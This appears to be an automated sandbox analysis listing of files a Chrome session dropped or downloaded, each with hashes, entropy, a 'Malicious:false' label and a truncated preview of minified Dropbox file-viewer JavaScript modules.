                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_lodash","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_core_i18n"],(function(e,t,i,s,r,n){"use strict";var o=function e(t){return Object.freeze(t),Object.getOwnPropertyNames(t).forEach((function(i){!t.hasOwnProperty(i)||null===t[i]||"object"!=typeof t[i]&&"function"!=typeof t[i]||Object.isFrozen(t[i])||e(t[i])})),t},_=i.getDefaultExportFromCjs(o);function a(e){if(null==e)throw new TypeError("Cannot thaw null/undefined object");if(Array.isArray(e))return e.slice();{const t=Object.create(Object.getPrototypeOf(e)),i=Object.getOwnPropertyNames(e);for(const s of i){const i=Object.getOwnPropertyDescriptor(e,s);i&&(i.get||i.set)?(i.configurable=!0,Object.defineProperty(t,s,i)):t[s]=e[s]}return t}}function d(e,t,i){if(null==e)throw new TypeError("Object to `set` cannot be null");if(e[t]===i)return e;{const s=a(e);return s[t]=i,_(s)}}class l{get ago(){return p(this.ts)}get agoFromLastActionByUserTs(){return p(t
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2890)
                                                    Category:dropped
                                                    Size (bytes):2981
                                                    Entropy (8bit):5.302604887692128
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EF9E640B2C938FCCD544EFB7D6279A93
                                                    SHA1:1A45616A60D78143EE5F99C6493D8B56A1F4EC3E
                                                    SHA-256:78B1AB0E403C1B88A7234F213E1CA15A08E0062D1687B36F8E60EBC5741998A5
                                                    SHA-512:CF4EDAD0A9668438C7D8FE5DA127A0DD490C5416C8DF9649DECBAFF967831585A34525B95FCE9CD410254CBC95072A6E35D685AC7B5FB991D73A1028B922DFF4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_action_plugins_conversion_action_conditions","./c_photo-editor_plugin_show-edit-plugin"],(function(e,i,S,r){"use strict";const E=[i.SDKPreviewSurface.BROWSE,i.SDKPreviewSurface.SEARCH,i.SDKPreviewSurface.STANDALONE_PREVIEW,i.SDKPreviewSurface.FILE_LOCKING,i.SDKPreviewSurface.RECENTS,i.SDKPreviewSurface.STARRED,i.SDKPreviewSurface.HOME,i.SDKPreviewSurface.INBAND_SHARE,i.SDKPreviewSurface.SHARED_CONTENT_LINK,i.SDKPreviewSurface.SHARED_LINK,i.SDKPreviewSurface.HELLOSIGN,i.SDKPreviewSurface.PHOTOS,i.SDKPreviewSurface.FSS_DESKTOP_PREVIEW,i.SDKPreviewSurface.POLLUX_DESKTOP_PREVIEW,i.SDKPreviewSurface.POLLUX_DESKTOP_SEARCH_PREVIEW],P={shouldShowForPreviewSurface:S.filterSurfaceIn(E),shouldShowForPreviewType:e=>S.filterPreviewTypeIn([i.PreviewType.Video,i.PreviewType.Audio])(e),filterValidFile:(e,S,r)=>S&&!i.isDownloadAllowed(S)||r||i.isEncryptedFile(e)?void 0:e},o={...P,filterValidUser:S.filterLoggedInUser},a={...P,filterValidUse
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (673)
                                                    Category:dropped
                                                    Size (bytes):761
                                                    Entropy (8bit):4.756957967501378
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:14324601591294B44A8BBB97759E9E73
                                                    SHA1:FC9CB5A0B7F207BF00C85B6C9CF6F3D461633C59
                                                    SHA-256:9758CBEF25D227DA05E875FD7C53D823C58476736DE096567BE95E380A248FFA
                                                    SHA-512:09FA9C31275ABD5B7FACE37FFB0CE9975B5AAA477E535470F8A0E5DF67BF5BF461DC57A23B6D287CA3C4260819CF6E343EDE88C53BF148EAFD3CFC4D7DF905D8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_file_viewer_common_share_helpers","./e_file_viewer_static_scl_page_folder","react","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,_,t,o,r,s,n,c,a,i,d,l,f,m,p,v,u,g,h){"use strict";e.getDataForContentInfo=_.getDataForContentInfo,e.share=_.share}));.//# sourceMappingURL=c_file_viewer_common_share_helpers.after-display.js-vflQm6-sJ.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1120)
                                                    Category:dropped
                                                    Size (bytes):1185
                                                    Entropy (8bit):5.102994118545214
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DDB55B3DAE93F775E818F2C6D3632312
                                                    SHA1:BE43DF140668AF4E423DEF40345B66AB63B2C25C
                                                    SHA-256:F8A59A323AC502AF3C6E61A907F421A10E522F3B472BAF4BAA757BB4A7BAE32A
                                                    SHA-512:E8218BAF0EFD821EFFDE4748E6F1492280D9644C65B934F71B6C1340AC6C81429EDEB83F5EB8D4FFCFF8327F411B7C24AD9A37C72E470D383E3F4097E399E16F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./e_edison","./c_ts_utils","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_lodash"],(function(e,n,o,i,s,t,d,a){"use strict";async function c(){const{ensureCookiesAreEnabled:n}=await new Promise((function(n,o){e(["./c_edison_cookies_check"],n,o)}));if(n()&&function(){var e;try{const n="www.dropbox.com"===(null===(e=window.top)||void 0===e?void 0:e.location.host),o=window.self!==window.top;return!n||!o}catch(e){return!0}}()){(async()=>{const{showToastFromCookie:n}=await new Promise((function(n,o){e(["./c_core_toast_toast_on_init"],n,o)}));n()})()}}n.initPage=function(e){const n="string"==typeof e?i.unmarshalProto(e,o.EdisonInitParams):o.EdisonInitParams.fromJson(e);o.Edison.init();const{streamingEnabled:s,isBuildTimePrefetchesEnabled:t,isCssPreloadEnabled:d,isReactNextEnabled:a}=n;o.Edison.setIsStreamingEnabled(s),o.Edison.setIsBuildTimePrefetchesEnabled(t),o.Edison.setIsCSSPreloadEnab
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1760)
                                                    Category:downloaded
                                                    Size (bytes):1830
                                                    Entropy (8bit):5.1908453686463965
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:486CD4F2632E0DEA43C0C4DE8159721B
                                                    SHA1:FB64D4629186D91656F5CEBF1B7C41BC37EC15D5
                                                    SHA-256:69D8B88624C53B47A99B1BBC2453240A0F12279AC03E2C3A852607CBD63030D0
                                                    SHA-512:BF165D18A17F73DD14D3E538246C916D386088F5F3A256B325B1899CCA0E4FD7E10C40C4A8D60D0D836AFEEA7FEF7CA446FC5A2FC0CE7E7A573436CA5293E1DC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_core_utils_browser_detection-vflSGzU8m.js
                                                    Preview:define(["exports"],(function(e){"use strict";const o=function(e=navigator.userAgent){const o=function(e){const o=e.toLowerCase(),n=/(ipad)/.exec(o)||/(edge)[ \/]([\w.]+)/.exec(o)||/(edg)[ \/]([\w.]+)/.exec(o)||/(chrome)[ \/]([\w.]+)/.exec(o)||/(webkit)[ \/]([\w.]+)/.exec(o)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(o)||/(msie) ([\w.]+)/.exec(o)||/(trident).*? rv:([\w.]+)/.exec(o)||o.indexOf("compatible")<0&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(o)||[],i=o.match(/version\/([\d.]+)/i);let r=null!=i?n[1]:null;return"webkit"===r&&(r=null!=i?i[1]:null),{browser:n[1]||"",version:r||n[2]||"0",userAgent:e}}(e);return"trident"===o.browser&&(o.browser="msie"),o}(),n=Boolean(/(ipod)/.exec(navigator.userAgent.toLowerCase())),i="ipad"===o.browser||void 0,r=!("webkit"!==o.browser&&!Boolean(i))||void 0,t=Boolean(/(iphone)/.exec(navigator.userAgent.toLowerCase()));function s(e=navigator.userAgent){const o=(e||"").toLowerCase();return n||t||-1!==o.indexOf("tizen")||-1!==o.indexOf("android")&&-1!==o.ind
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1408)
                                                    Category:dropped
                                                    Size (bytes):1474
                                                    Entropy (8bit):5.121215155850568
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0761CDDBC502427A9E865743EC29565F
                                                    SHA1:675486FE76A811E3080C1F01F95A26CFB16AA21F
                                                    SHA-256:A2FAE9A61F5C1F53B94B181F68298902D99C7AB29C4A6268251DCA3282ACF921
                                                    SHA-512:E720559D0BF97B66EFCE2B9ADA5CC53A2F0D1855FB7DBE55051E849450DBA127B0DECFAFD8236C345CA7E70ECDDBA93DCEDB348CD764818CF945C93648311274
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,_){"use strict";_.injectInternalStyle("/static/js/file_viewer/preview_text/preview_text.module.out-vfld1b1AK.css",(e=>"._scrollableContainer_158wm_1{height:100%;overflow:auto;width:100%}._block_158wm_7{counter-reset:lineNumber}._lineContainer_158wm_11{counter-increment:lineNumber;font-family:var(--type__body__monospace--fontfamily);padding-left:var(--dig-spacing__micro__small)}._lineContainer_158wm_11::marker{color:var(--dig-color__text__subtle);content:counter(lineNumber);min-width:var(--dig-spacing__macro__xlarge);text-align:right;-webkit-user-select:none;user-select:none}._lineContent_158wm_25{flex:1;overflow-wrap:anywhere}._spinnerContainer_158wm_30{align-items:center;display:flex;height:100%;justify-content:center;width:100%}._gray_158wm_38{color:var(--dig-color__text__subtle)}._green_158wm_42{color:var(--dig-color__accent__green)}._blue_158wm_46{color:var(--dig-color__accent__cyan)}._red_158wm_50{color:var(--
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (22113)
                                                    Category:dropped
                                                    Size (bytes):22177
                                                    Entropy (8bit):5.294276588008567
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C40A0E71CBE5B15C4BAF9E150E50CBAB
                                                    SHA1:88E03EE399EBB988B035911131245DE1569506D6
                                                    SHA-256:60E5E39B39E38D1B02EEC3E19E405156D4A52F28B12ED4306DDF5B977A308727
                                                    SHA-512:4C1B63782664C1544D75354F2BBDAD80678025E34336737730D25C3E9FE560C00AC4DF9AC383AEA8140038EC1A1746C90523CA9D73F1B4A8329D4A125131D838
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","react","./e_file_viewer_static_scl_page_folder","./c_atoms_dwg-box_index","./c_helpers_hooks_component-did-mount","./c_dig-icons_assets_ui-icon_line_rewind","./c_core_notify","./c_core_i18n","./c_admin_registration_source_constants","./e_core_exception","./c_integrations_hellosign_deep_integration_constants","./c_api_v2_routes_folders_info_provider"],(function(e,t,n,a,r,i,o,s,l,c,d,u,m){"use strict";function p(e){return e&&e.__esModule?e:{default:e}}var g=p(n);const f=g.default.createContext({onError:()=>{}});class L extends Error{constructor(e,t){super(e),this.name="DWGComponentRenderError",this.stack=null==t?void 0:t.stack}}class _ extends g.default.Component{constructor(){super(...arguments),this.state={hasError:!1}}static getDerivedStateFromError(e){return{hasError:!!e}}componentDidCatch(e){var t;const{hostComponentName:n,extraMessage:a,onError:r,isCritical:i}=this.props,o=new L(`A ${i?"critical":"non-critical"} error happened in ${n} and it is being ha
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1425)
                                                    Category:dropped
                                                    Size (bytes):1482
                                                    Entropy (8bit):5.117089538429705
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DD76EA9433A184F04D31BD904A71A3BA
                                                    SHA1:5474C0BC0F017A177768A6508AF397A02386205E
                                                    SHA-256:DE337C9626B38D1CA0915D03F9CA1EB62C69B7AF10262EDE55AD7E7BCD8FAAB2
                                                    SHA-512:7EC50D8A4D668EFC4C345CF0349CA4B93A757CD0E3FA078723D9260022A30A4A08EBA02AAF6978E53B1E5902DFD685A3B5FB5D17B86C793B0F63A346910410C2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react"],(function(e,t,r){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var c=n(r);const a=c.forwardRef(((e,r)=>{const{children:n,className:a="",disabled:l,href:o,size:s="default",variant:u="primary",fullWidth:i=!1,onClick:b,shouldWrapContent:d=!1,type:m,...f}=e,p=r||c.createRef();let{tagName:y="button",...v}=f;const _=t.cx(a,{"mc-button":"styleless"!==u,"mc-button-styleless":"styleless"===u,"mc-button-primary":"primary"===u,"mc-button-secondary":"secondary"===u||"borderless"===u,"mc-button-circular":"circular"===u,"mc-button-invisible":"invisible"===u,"mc-button-borderless":"borderless"===u,"mc-button-large":"large"===s,"mc-button-small":"small"===s,"mc-button-disabled":l,"mc-b
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5193)
                                                    Category:dropped
                                                    Size (bytes):5276
                                                    Entropy (8bit):5.23459511237714
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:60B3BD2BCE825BB8AE0A1BD23C447B1D
                                                    SHA1:2AC94E89D88FA683C604C2119895721030074DE4
                                                    SHA-256:CC35DCA7B766661EFA1435138AB945FA00FEE69E6FB05B49998CA1FE977D2CD8
                                                    SHA-512:EE3661CE6071E6B6FD636F408DB6244E723E1CCD01E86B15CA3654E6985A0E01D51019D34E4135BB1C1E41AC9633B0850F54EAF21A9630640B59371A344F3725
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_dig-components_skeleton_index","./c_file_viewer_components_preview_button","./c_file_viewer_preview_tour_preview_tour_configs","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_photo-editor_plugin_show-edit-plugin","./c_pap-events_sign_save_signature_doc","./c_pap-events_previews_create_folder"],(function(e,t,o,n,i,r,a,l,s,d,c,_,p,u,m,w,g,f,b,v,y,h,M,E,k){"use strict";function D(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(o){if("default"!==o){var n=Object.getOwnProp
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (980)
                                                    Category:downloaded
                                                    Size (bytes):1049
                                                    Entropy (8bit):5.215510298773958
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:65C853CE1D9336CFC97150D0A84EBA25
                                                    SHA1:29A498B34C65FCDD38ED9AD4CF39A249C50B7B5D
                                                    SHA-256:F69FDC5D3B69E788B1613E4FBD23C30D1095DCB1849DCF8893E93D996598DB9B
                                                    SHA-512:9FD718712B718327EA03559CFF1FB12EC1F1A33A9A0694CA20589A4B18C116D4021640C51E9CC0B4A4C0C29DE26DECCFEE3A60DA46AA764F0E81AC33604AA6D6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_sync_everything_redux_store-vflZchTzh.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_sync_everything_redux_types"],(function(e,t,r){"use strict";function u(e=r.defaultBackupState,t){switch(t.type){case r.Actions.SET_BACKUPS:return function(e,t){return{...e,backups:t.payload.backups}}(e,t);case r.Actions.SET_CURRENT_BACKUP:return function(e,t){return{...e,isInsideBackup:null!==t.payload.backup,currentBackup:t.payload.backup}}(e,t);case r.Actions.SET_LAST_BACKUP_TIMES:return function(e,t){return{...e,lastBackupTimes:e.lastBackupTimes.set(t.payload.fqPath,t.payload.lastBackupTime)}}(e,t);case r.Actions.SET_STORMCROWS:return function(e,t){return{...e,stormcrows:t.payload.stormcrows}}(e,t);case r.Actions.SET_USER_SKU:return function(e,t){return{...e,userSKU:t.payload.userSKU}}(e,t);case r.Actions.SET_USER_QUOTA:return function(e,t){return{...e,userQuota:t.payload.userQuota}}(e,t)}return e}let a;e.getStoreForBackup=()=>(a||(a=t.getStoreAndRegisterReducers({[t.BACKUP_NAMESPACE_KEY]:u})),a)}));.//# sourceMappingUR
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):382
                                                    Entropy (8bit):5.284940688042797
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:18731A8D2270260F20B2E767B675F179
                                                    SHA1:44EE90A497151E6C3D287977AE6F6489F0564701
                                                    SHA-256:4A814DC1171AB323E8A677096D2E1B9134B59964F442E76F45778CC0D40BE8DE
                                                    SHA-512:67297562E6395002C2261C875449CFE8997F9608F0F6AB3FE9047A383702E2B51B266223FF1DECD2F5D79C23F57903120E1731ABC8154918FFF5BF8A9450E058
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,i){"use strict";const t=new Set([...i.PHOTO_EXTS,...i.TRANSCODE_VIDEO_EXTS,...i.AUDIO_EXTS,".pdf"].map((e=>e.replace(".",""))));e.isLowDistractionViewAvailableForFile=function(e){const n=i.file_extension(e);return t.has(n)}}));.//# sourceMappingURL=c_sharing_low_distraction_view_gating_utils.js-vflIB667x.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1065)
                                                    Category:downloaded
                                                    Size (bytes):1130
                                                    Entropy (8bit):4.903694709535125
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:937E7A2FEBBEC03221F1016AD382A30C
                                                    SHA1:3166714E14CF31EC55F16EB6DD6D1CC44227B666
                                                    SHA-256:9C80844A15D1017070E53527DFC761C9AB70C6B8BD5A275FBC11A79268C73934
                                                    SHA-512:390B841CEB7A8D76701C6F3163D75CCE116D0028E7F1CC14DB6E1D50E2C12B5D933C74402C7E4BB6194E886C0AC4795D10C6CDBDE52693C3DD121E0E54294E63
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_features_download_index-vflk356L-.js
                                                    Preview:define(["exports","./c_download_components_post-download-pre-susi-modal","./e_file_viewer_static_scl_page_folder","react","./c_dig-illustrations_hero_remote-work","./c_core_i18n","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(o,e,t,n,a,_,r,d,l,s,i,c,w,g,m,S,p,u,P,D){"use strict";o.PostDownloadPreSUSIModal=e.PostDownloadPreSUSIModal,o.getIsTimeEligibleToShowPostDownloadPreSUSIModal=e.getIsTimeEligibleToShowPostDownloadPreSUSIModal,o.DownloadFormatting=t.formatting_esnext,o.DownloadWarningModal=t.DownloadWarningModal,o.PostSignupDownloadModal=t.PostSignupDownloadModal,o.PreDownloadSUSIModalFooter=t.PreDownload
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (2257)
                                                    Category:dropped
                                                    Size (bytes):2348
                                                    Entropy (8bit):5.089486823707345
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:042E072850B1E23824AF30B5DCC8A834
                                                    SHA1:D20B83C3097511CB2FF8BED436FAF69FAD94E605
                                                    SHA-256:CB9A6181C693307BFD7A38983EB46140D63128D43C353C0C6747877234CEB5E5
                                                    SHA-512:C0CC0E3F30D42FB6422FD939E8687ADEA402EDE9693348BE65C4027E6260BA797FDC73996217CC4B44AC8E87D2AB85F2B661D6B868DEBA47D9762333FED182AE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_core_i18n"],(function(e,t){"use strict";e.deleteCompleteError=e=>{if(1===e.length){const o=e[0].failure;if("too_many_files"===o[".tag"]||"too_many_write_operations"===o[".tag"])return t.intl.formatMessage({id:"ane1pD",defaultMessage:"There are too many files in one request. Please retry with fewer files."});if("path_lookup"===o[".tag"]&&"not_found"===o.path_lookup[".tag"])return t.intl.formatMessage({id:"9suezP",defaultMessage:"File does not exist."})}return t.intl.formatMessage({id:"pjyJun",defaultMessage:"{count, plural, one{Couldn.t delete {count} item.} other{Couldn.t delete {count} items.}}"},{count:e.length})},e.deleteCompleteSuccess=(e,o)=>o<e?t.intl.formatMessage({id:"QGz6Gm",defaultMessage:"{count, plural, one{Deleted {succesfully_deleted_files} out of {count} item.} other{Deleted {succesfully_deleted_files} out of {count} items.}}"},{count:e,succesfully_deleted_files:o}):t.intl.formatMessage({id:"THAbub",defaultMessage:"{count, plural, one{Deleted {
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (11004)
                                                    Category:downloaded
                                                    Size (bytes):11069
                                                    Entropy (8bit):5.342281473966308
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:87B9E62ED0228ED9A8940EFC6081A88A
                                                    SHA1:D201DF558ABEC3CCF29A67C7CD2FA4E56D2DD1E6
                                                    SHA-256:842963D0F69F36655D6FF1F787CB124FC248FEB97C71547A07FE7C3AFA137F71
                                                    SHA-512:6A89D90EBD9E8DB2F2137823778CE21A9B615D6B4B5A2E0CDFC47FFE4CC5D2998B7E95666EEBBD7908A1D75DEAEE09215B9437BA998A954A161379A722FAC27A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_flows_conversions_utils-vflh7nmLt.js
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","./c_flows_constants","react","./c_unity_utils","./c_action_plugins_conversion_action_conditions","./c_replay_replay_extensions","./c_browse_models","./c_lodash","./c_core_i18n","./c_api_v2_routes_folders_info_provider"],(function(e,i,r,t,o,n,a,l,s,u,c,d){"use strict";function f(e){return e&&e.__esModule?e:{default:e}}var _=f(o);const v={};let p=null,S=0;const w=(e,i)=>{const o=()=>{p&&(p.unsubscribe(),p=null)},n=async()=>{if(p)return;const a=await t.GetFlowsRoutes(i()).rpc("get_bolt_data",void 0,{});if(!((null==a?void 0:a.app_id)&&a.unique_id&&a.revision&&a.token))return;const l=new r.SignedChannelState(a.app_id,a.unique_id,a.revision,a.token);p=new r.ThunderClient([l],(e=>{const i=e.map((e=>e.payloads)).reduce(((e,i)=>e.concat(i)),[]).map((e=>e.payload));for(const e of Object.values(v))e(i)}),(()=>{o(),n()}),e),p.start()};return{subscribe:e=>{const i="flows-subscription-"+S++;return v[i]=e,1===Object.keys(v).length&
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5797)
                                                    Category:dropped
                                                    Size (bytes):5875
                                                    Entropy (8bit):4.996907377952998
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9232909C85C8E8D4F05C49B61128F51E
                                                    SHA1:CA264C2671B17691E0F6A03EEF31AF62383DACD2
                                                    SHA-256:BBD1D06BC35E044A19A49A95E1AF32A98001877E7A202C6DE1FF92AD742711B7
                                                    SHA-512:EED31B57F867D65A52A1FE31216AB267C17AD4822D63B7D780FBCB96AA7F8CBFFF94E5774B3533EDFCF68237517F39D146FAD02FBB958A4DF96FE365D3C8C2A7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","react-dom"],(function(t,e,n,s){"use strict";function i(t){return t&&t.__esModule?t:{default:t}}var a=i(n),o=i(s),r=!1,l="unmounted",p="exited",u="entering",d="entered",c="exiting",E=function(t){function n(e,n){var s;s=t.call(this,e,n)||this;var i,a=n&&!n.isMounting?e.enter:e.appear;return s.appearStatus=null,e.in?a?(i=p,s.appearStatus=u):i=d:i=e.unmountOnExit||e.mountOnEnter?l:p,s.state={status:i},s.nextCallback=null,s}e._inheritsLoose(n,t),n.getDerivedStateFromProps=function(t,e){return t.in&&e.status===l?{status:p}:null};var s=n.prototype;return s.componentDidMount=function(){this.updateStatus(!0,this.appearStatus)},s.componentDidUpdate=function(t){var e=null;if(t!==this.props){var n=this.state.status;this.props.in?n!==u&&n!==d&&(e=u):n!==u&&n!==d||(e=c)}this.updateStatus(!1,e)},s.componentWillUnmount=function(){this.cancelNextCallback()},s.getTimeouts=function(){var t,e,n,s=this.props.timeout;return t=e=n=s,null!=s&
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (43828)
                                                    Category:downloaded
                                                    Size (bytes):43878
                                                    Entropy (8bit):5.396226280954063
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:69E25341A899917C95547C5534B9E054
                                                    SHA1:9838C26A1D593E2D0A66487DBC4CC1FDC6F30870
                                                    SHA-256:4D267431B2F292829107B14B9F1F6D9205D739986FFA4117FE56B7D013FFE6DB
                                                    SHA-512:23801DE9F72C653C5C1D681BE06BE917F518B4A8844083526D0EDA18A997C7ECB34BEF979A12B2A881C7CE1D02E5BA12D8EAD6C29E198F33A3B979ED6B77EE4A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_ts_utils-vflaeJTQa.js
                                                    Preview:define(["exports","./e_core_exception"],(function(e,t){"use strict";function n(e,t){if(!e)throw new Error(t)}const r=34028234663852886e22,i=-34028234663852886e22,s=4294967295,a=2147483647,o=-2147483648;function c(e){if("number"!=typeof e)throw new Error("invalid int 32: "+typeof e);if(!Number.isInteger(e)||e>a||e<o)throw new Error("invalid int 32: "+e)}function u(e){if("number"!=typeof e)throw new Error("invalid uint 32: "+typeof e);if(!Number.isInteger(e)||e>s||e<0)throw new Error("invalid uint 32: "+e)}function l(e){if("number"!=typeof e)throw new Error("invalid float 32: "+typeof e);if(Number.isFinite(e)&&(e>r||e<i))throw new Error("invalid float 32: "+e)}const f=Symbol("@bufbuild/protobuf/enum-type");function d(e){const t=e[f];return n(t,"missing enum type on enum object"),t}function h(e,t,n,r){e[f]=m(t,n.map((t=>({no:t.no,name:t.name,localName:e[t.no]}))))}function m(e,t,n){const r=Object.create(null),i=Object.create(null),s=[];for(const e of t){const t=y(e);s.push(t),r[e.name]=t,
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1687)
                                                    Category:dropped
                                                    Size (bytes):1747
                                                    Entropy (8bit):4.902313003816772
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4F62497361E698BA595CC15B075169CD
                                                    SHA1:71B296EC32B2502306F917567A9091BA77AA4A98
                                                    SHA-256:6055044B8CF7E492E2317695DA1AD621CE2891CA04C475558D8DD7E65894C4B2
                                                    SHA-512:6AFF413BF0CFA1EA69660BC70E4B85D7EA399F77A8DD824D818D0AB14F4EE710A20CA6B04FB286C0EA03CCD61FE00A786284D975B3CA9C9E739813E5D37DB80F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(e){"use strict";var a;e.VideoPreviewEvent=void 0,(a=e.VideoPreviewEvent||(e.VideoPreviewEvent={})).PlayerRendered="player_rendered",a.FirstClickPlay="first_click_play",a.MediaError="media_error",a.ChangePlaybackRate="change_playback_rate",a.ChangeVideoQuality="change_video_quality",a.ClosePreview="close_preview",a.TimeToBuffer="time_to_buffer",a.TimeToLoad="time_to_load",a.SeekVideo="seek_video",a.VideoStartsPlaying="video_starts_playing",a.VideoResumesPlaying="video_resumes_playing",a.VideoStalled="video_stalled",a.VideoStalledResume="video_stalled_resume",a.VideoPaused="video_paused",a.ScrubberThumbnailsLoaded="scrubber_thumbnails_loaded",a.ScrubberThumbnailsFailed="scrubber_thumbnails_failed",a.HoverScrubberThumbnailsSucceeded="hover_scrubber_thumbnails_succeeded",a.HoverScrubberThumbnailsFailed="hover_scrubber_thumbnails_failed",a.AudioWaveformLoaded="audio_waveform_loaded",a.AudioWaveformFailed="audio_waveform_failed",a.MediaEnded="media_ended",a.Video
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (52089)
                                                    Category:downloaded
                                                    Size (bytes):52147
                                                    Entropy (8bit):5.353682539161587
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:987A55A82041BB32DECFFB00CCB250EC
                                                    SHA1:D716A909D41D6E357974E605D5025E912F2850EF
                                                    SHA-256:95A27973B13A5C34633F14CBC65584DCCA15819256FA554DBEDFDDF60C652801
